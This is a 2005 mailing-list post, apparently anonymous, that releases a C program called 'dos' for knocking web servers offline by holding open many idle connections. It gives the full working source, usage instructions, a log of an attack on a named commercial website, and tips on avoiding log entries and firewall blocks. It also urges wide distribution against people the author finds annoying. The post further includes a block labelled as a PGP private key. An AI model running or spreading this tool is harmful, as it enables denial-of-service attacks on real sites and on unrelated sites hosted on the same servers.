Full Disclosure mailing list archives
web server DoS
From: George Orwell <nobody () mixmaster it>
Date: Mon, 25 Apr 2005 21:52:11 +0200 (CEST)
DoS - denial of service of web servers Usually when someone is annoying (sending spam, killing people or peoples, extincting species, torturing sensitive creatures) you might talk to them to work it out or take legal actions (complaining to the ISP of a spammer). But if this is not enough you can use dos to down their web site. Be aware that many web servers host multiple, often unrelated web sites. So by DoSing a web server you might also down innocent domains. This would increase pressure on the annoying person and their ISP, but may raise justified (legal) trouble and violate your ethics. When started without arguments dos print this: --------------------------------------------------------------- dos version 2.0 - denial of service attack against web servers: Usage: ./dos options hostname options with default values: -h this help -p 80 port number of remote host to connect to -c 200 maximum number of simultaneous connections -t 1h duration of dos attack. possible units: s=seconds (default) m=minutes h=hours d=days Example: ./dos -t 365d trafficmagnet.com -c 20 Warning! DoS attacks may be illegal in your country. Your ISP may close your internet access. Your IP address (which identifies your internet connection) typically appears in the attacked servers log files. This may be improved in future versions. The readme file contains further hints and information. ---------------------------------------------------------------- dos will try to make and maintain as many connections as given with the -c option. It does not send any requests so the connections will time out after a while. Many web servers process only a certain amount of connections (e.g. 150) and processing of further connections will be delayed by several minutes. Many web servers can be disabled with a single invocation of dos. However, the risk of legal actions or complaints to your ISP is considerable. It is also relatively easy to block your IP address with a firewall. A website may seem to be down but reachable from a different host (e.g. when using a proxy) So a different tactic is to use a low connection limit, e.g. 10% of the server limit and a long time . This will not disable the server unless many people do that. This may happen if the dos program is spread widely and used frequently against annoying peoples web servers. The owners of web sites will less likely sue people or complain to their ISPs if they are attacked by many people and would need to constantly add new people to their firewall. Rather they will install an automatic intrusion detecion system or firewall. Then it is time to further develop dos. It will then download preferably large files very slowly many times in parallel. This should be more difficult to detect as it is "normal" usage of a web server. It will disable web servers by keeping all the connections busy and additionally the web server may have to keep more information in memory for each file being downloaded. The activity of dos leaves traces in web servers log files. In apaches access.log: 10.0.0.13 - - [19/Apr/2005:19:32:59 +0200] "-" 408 - "-" "-" 408 means Request Timeout - The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time. From http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html . 10.0.0.13 is the IP address. It is possible to prevent this log entry (at least on my apache) by closing the connections before they time out. In error.log: [Tue Apr 19 14:51:23 2005] [error] server reached MaxClients setting, consider raising the MaxClients setting If you specify a too high number with -c you get a message like 'There are only 1018 simultaneous connections supported currently.' The usual limit on Linux is 1024 minus the number of files that are open when dos starts. The limit with cygwin is 64 (with 2 open files, IIRC). Making dos windows native may raise that limit. dos includes the FD_SETSIZE constant as the absolute limit when it is compiled from the C source code to the executable/binary form. If you use a binary and suspect that your OS supports more connections than dos says recompile dos. If you want to make more connections than supported run dos multiple times. Here is a real example. trafficmagnet.com is the web site of the spammer "Sarah Williams". They got well known for advertising their useless business in email spam. ./dos trafficmagnet.com time=3600, hostname=trafficmagnet.com, port=80, connections=200 200/222,314/3600 200=current number of connections 222=total connections made so far 314 of 3600s have passed In this case it took 53 minutes (!) to load the web page: time wget http://trafficmagnet.com --18:43:12-- http://trafficmagnet.com/ => `index.html.10' Resolving trafficmagnet.com... done. Connecting to trafficmagnet.com[202.157.184.231]:80... connected. HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers. Retrying. --18:46:28-- http://trafficmagnet.com/ (try: 2) => `index.html.10' Connecting to trafficmagnet.com[202.157.184.231]:80... connected. HTTP request sent, awaiting response... Read error (Connection timed out) in headers. Retrying. --19:01:30-- http://trafficmagnet.com/ (try: 3) => `index.html.10' Connecting to trafficmagnet.com[202.157.184.231]:80... connected. HTTP request sent, awaiting response... Read error (Connection timed out) in headers. Retrying. --19:16:32-- http://trafficmagnet.com/ (try: 4) => `index.html.10' Connecting to trafficmagnet.com[202.157.184.231]:80... connected. HTTP request sent, awaiting response... Read error (Connection timed out) in headers. Retrying. --19:31:36-- http://trafficmagnet.com/ (try: 5) => `index.html.10' Connecting to trafficmagnet.com[202.157.184.231]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,953 [text/html] 100%[========================================================>] 9,953 17.14K/s ETA 00:00 19:36:27 (17.14 KB/s) - `index.html.10' saved [9953/9953] real 53m15.686s user 0m0.025s sys 0m0.040s I release dos under the GNU general public license. Please give it to your friends. Since I want to avoid spammers and other annoying folks to turn dos against me I will remain anonymous. You may send messages to me in alt.anonymous.messages with a subject of 635D3815 - my gpg key id. I can not promise that I will actually check this newsgroup for mail. If you know a place (http/ftp) that is willing and able (invulnerable to dos DoS attacks) to host dos please tell me (via alt.anonymous.messages). There's gonna be a trust problem distributing this as binary. Well, there should be. Anyone wants to make a gui? 635D (I will go by this name for now) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.2.5 (GNU/Linux) mQGiBEJlkQIRBADn1QHh8M5qlokUmuyft41rFBfyMrIO3vEqW+ZW68d9ruA926Zb kmmlFriRpqTTM3q5WG9a0JODjdPCRRigO8OEZ7a6zSADxydOha/0iXHYK76tjldU 13tGfuOGfqy33mmNIvbCGdVbcPAX2FT3jbF4M5YsxMLeo6WsfkAwVoUgawCg1agW YX3vpCecueIsZCHtCN3SiA8D/jnWltv2f9Eeta0/d7VVeDTXtHiCCic+5zGnvXll 8wV0V+6Xh39Gr9NH6Gu54kGvEFgJuyF6O07vqmzVLrCICeQ4VQuaM6LPSFce/da8 hYdlxwGajPPEapGNMmy9H6QcPUYkLQFEBFAgR7LFl3nITCmYOQtcAFZY998A8zRX yqT/A/4yqyZO4iELpl2yjPis8LeNM38M1zJ9qTy1Ygmzt24z109sx68ITVPjuqnw xp67hcxTQh801BUZxcXCCL7+iLuoIRqiuxFBZGjBNFsf+nxUQc33Bvuo+yphd2on CgZu8knbCCIRqdxZZWK4I/vg/kwEqJpKYlbZThj/UbC2qmh3BLQMJzYzNUQnIChE b1MpiF4EExECAB4FAkJlmfoCGwMGCwkIBwMCAxUCAwMWAgECHgECF4AACgkQBLpY p2NdOBWEpwCdFcAGrnbXEW4iHSgNqz2sdPned78AoLimK0HJxTRTT/LC9GcxcZbU KUmtuQENBEJlkQUQBADAtzjUF3BaBd9cr7OYhJpmhO0CPfjiU1DrSDBOVxMfJA+0 +g6Zr8D+/b3+ryog+Ure+vISsbftZJ8Xy+txg6PHNPllcD3y3mY9OMiR8wB0fFKN 5RhnzRqm9tn5H0Ncko5V9kRjoj5Y3h2ycRP23eQ5CQ6phLFTmNpeSwYLMGLEjwAD BQQAvkrEbIAIhK3ivPqcWBu8JEHZdlMZ/NOQaHSEqRnXCAsOFfYU7OUBuKSuzIUz mzTp5ovw15RTJRpBABKUyEHFClIHe5aaZ3DgcutVWtzZxVzDs3sdqyoW6pPFQpog 8pdcH6knr8UQ/xttrKuoHGHHkGfJl7b7nZw5KhHU+fN8kMSISQQYEQIACQUCQmWR BQIbDAAKCRAEulinY104FcpGAKCYtvFlyU8Yd6rX5M8+8ueN5S4TGQCdGU5EFcKA QwFNIdosUXsZk3GTlvs= =v4+s -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP PRIVATE KEY BLOCK----- Version: GnuPG v1.2.5 (GNU/Linux) lQHhBEJlkQIRBADn1QHh8M5qlokUmuyft41rFBfyMrIO3vEqW+ZW68d9ruA926Zb kmmlFriRpqTTM3q5WG9a0JODjdPCRRigO8OEZ7a6zSADxydOha/0iXHYK76tjldU 13tGfuOGfqy33mmNIvbCGdVbcPAX2FT3jbF4M5YsxMLeo6WsfkAwVoUgawCg1agW YX3vpCecueIsZCHtCN3SiA8D/jnWltv2f9Eeta0/d7VVeDTXtHiCCic+5zGnvXll 8wV0V+6Xh39Gr9NH6Gu54kGvEFgJuyF6O07vqmzVLrCICeQ4VQuaM6LPSFce/da8 hYdlxwGajPPEapGNMmy9H6QcPUYkLQFEBFAgR7LFl3nITCmYOQtcAFZY998A8zRX yqT/A/4yqyZO4iELpl2yjPis8LeNM38M1zJ9qTy1Ygmzt24z109sx68ITVPjuqnw xp67hcxTQh801BUZxcXCCL7+iLuoIRqiuxFBZGjBNFsf+nxUQc33Bvuo+yphd2on CgZu8knbCCIRqdxZZWK4I/vg/kwEqJpKYlbZThj/UbC2qmh3BP4DAwINlHOYiKny SmBLTjDsH9WjkTEjyZtgDimCkDZYCcpaWWsKYMNG+IhqG2mG7YvkaO9Oj0Thz1JJ D7KajrQMJzYzNUQnIChEb1MpiF4EExECAB4FAkJlmfoCGwMGCwkIBwMCAxUCAwMW AgECHgECF4AACgkQBLpYp2NdOBWEpwCdFcAGrnbXEW4iHSgNqz2sdPned78AoLim K0HJxTRTT/LC9GcxcZbUKUmtnQFYBEJlkQUQBADAtzjUF3BaBd9cr7OYhJpmhO0C PfjiU1DrSDBOVxMfJA+0+g6Zr8D+/b3+ryog+Ure+vISsbftZJ8Xy+txg6PHNPll cD3y3mY9OMiR8wB0fFKN5RhnzRqm9tn5H0Ncko5V9kRjoj5Y3h2ycRP23eQ5CQ6p hLFTmNpeSwYLMGLEjwADBQQAvkrEbIAIhK3ivPqcWBu8JEHZdlMZ/NOQaHSEqRnX CAsOFfYU7OUBuKSuzIUzmzTp5ovw15RTJRpBABKUyEHFClIHe5aaZ3DgcutVWtzZ xVzDs3sdqyoW6pPFQpog8pdcH6knr8UQ/xttrKuoHGHHkGfJl7b7nZw5KhHU+fN8 kMT+AwMCDZRzmIip8kpgWyj/jI8FmRSDZHBTykp7Stly44rg+mgDNpK86Rz9ir/w PN06YYja4Q8FnqW00S1TOF7A76qklIMnRzjZLfyISQQYEQIACQUCQmWRBQIbDAAK CRAEulinY104FcpGAKDNV73Z8GQ+bGGRRrAl9uGy0J+VPwCfUdOX48zkgwsMZqBb wj1cnC3I+n4= =H8Nj -----END PGP PRIVATE KEY BLOCK----- My signature on dos-2.0.c: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQBCbTBgBLpYp2NdOBURAnK3AJoDBncuZ9zybDX/Kj2fXLaBIf78KgCfZcWB JL8+6LrCNOmk7XLEZRQG2FU= =tm/U -----END PGP SIGNATURE-----
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/select.h> #include <netinet/ip.h> #include <netdb.h> #include <getopt.h> #include <errno.h> extern int h_errno; void usage(int rc); int myselect(int wait); #if 200>FD_SETSIZE #define MAXP FD_SETSIZE #else #define MAXP 200 #endif /* variable names np number of currently parallel connections nt total number of connections made so far maxp maximum number of parallel connections t0 unix time at program start cl connection limit */ int s[FD_SETSIZE],cl=FD_SETSIZE; unsigned int maxp=MAXP; char *argv0; int main(int argc, char **argv) { int rc,i,np,c,opt1=0,nt=0; unsigned int mytime=3600; unsigned short port=80; struct hostent *h; struct sockaddr_in sa={AF_INET,0,{0}}; char *hostname="",timeunit='s'; time_t t0; //how many sockets can we make? for (i=0;i<FD_SETSIZE;i++) { if (-1==(s[i]=socket(PF_INET,SOCK_STREAM,6)) ) { if (EMFILE==errno) { cl=i; break; } else { perror("socket()"); exit(8); } } } for (i=0;i<cl;i++) { close(s[i]); s[i]=-1; } argv0=argv[0]; if (argc==1) usage(0); while (1) { c = getopt(argc, argv, "-hp:t:c:"); if (c == -1) break; switch (c) { case 1: if (++opt1>1) { puts("too many arguments"); exit(1); } hostname=optarg; break; case 'h': usage(0); break; case 'p': if (1!=sscanf(optarg,"%hd",&port)) { puts("invalid port"); exit(2); } break; case 't': rc=sscanf(optarg,"%d%c",&mytime,&timeunit); if (2!=rc && 1!=rc) { puts("invalid time"); exit(3); } switch (timeunit) { case 's': break; case 'm': mytime*=60; break; case 'h': mytime*=3600; break; case 'd': mytime*=24*3600; break; default: printf("Invalid time unit '%c'\n",timeunit); exit(3); break; } break; case 'c': if (1!=sscanf(optarg,"%d",&maxp)) { puts("invalid connection limit"); exit(4); } if (maxp>cl) { printf("There are only %d simultaneous connections supported currently.\n",cl); puts("The readme file contains information about this limit."); exit(5); } break; case '?': exit(3); break; default: printf ("?? getopt returned character code 0%o ??\n", c); exit(6); } } printf ("time=%u, hostname=%s, port=%hu, connections=%u\n", mytime,hostname,port,maxp); if (0==opt1) { puts("missing hostname"); exit(8); } if (!(h=gethostbyname(hostname))) { printf("unknown host %s: %d\n",argv[1],h_errno); exit(6); } memcpy(&sa.sin_addr.s_addr,h->h_addr_list[0],h->h_length); //sa.sin_addr.s_addr=h->h_addr_list[0]; sa.sin_port=htons(port); t0=time(NULL); while (1) { for (i=0;i<maxp;i++) { while (-1==s[i]) { if (-1==(s[i]=socket(PF_INET,SOCK_STREAM,6)) ) { perror("socket()"); exit(8); } if (-1==connect(s[i],(struct sockaddr *) &sa,sizeof(sa))) { perror("\nconnect failed"); close(s[i]); s[i]=-1; sleep(1); } else { nt++; } np=myselect(0); printf(" %d/%d,%d/%d \r",np,nt,(time(NULL)-t0),mytime); fflush(stdout); if (time(NULL)-t0>mytime) exit(10); } } if (np==maxp) { np=myselect(1); printf(" %d/%d,%d/%d \r",np,nt,(time(NULL)-t0),mytime); fflush(stdout); } if (time(NULL)-t0>mytime) exit(10); } //while 1 } // main() int myselect(int wait) { int np=0,i,retval,maxs=-1; struct timeval tv; fd_set rfds; FD_ZERO(&rfds); for (i=0;i<maxp;i++) { if (-1!=s[i]) { maxs=s[i]>maxs ? s[i] : maxs; FD_SET(s[i],&rfds); np++; } } if (-1==maxs++) return(0); if (wait) { tv.tv_sec=1; tv.tv_usec=0; } else { tv.tv_sec=0; tv.tv_usec=0; } retval = select(maxs, &rfds, NULL, NULL, &tv); if (retval == -1) { perror("select()"); exit(9); } else if (0==retval) { // printf("select() returned with empty set?!?\n"); // exit(2); } else { for (i=0;i<maxp;i++) { if (s[i]!=-1 && FD_ISSET(s[i],&rfds)) { close(s[i]); s[i]=-1; np--; } } } return(np); } //myselect() void usage(int rc) { puts("\ndos version 2.0 - denial of service attack against web servers:"); printf("Usage: %s options hostname\n",argv0); puts("options with default values:"); puts("-h this help"); puts("-p 80 port number of remote host to connect to"); printf("-c %d maximum number of simultaneous connections\n",200>cl ? cl : 200); puts("-t 1h duration of dos attack. possible units:"); puts("s=seconds (default)"); puts("m=minutes"); puts("h=hours"); puts("d=days"); printf("\nExample: %s -t 365d trafficmagnet.com -c 20\n",argv0); puts("\nWarning! DoS attacks may be illegal in your country."); puts("Your ISP may close your internet access."); puts("Your IP address (which identifies your internet connection)"); puts("typically appears in the attacked servers log files."); puts("This may be improved in future versions."); puts("\nThe readme file contains further hints and information.\n"); exit(rc); } //usage()
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- web server DoS George Orwell (Apr 25)
- Re: web server DoS Valdis . Kletnieks (Apr 25)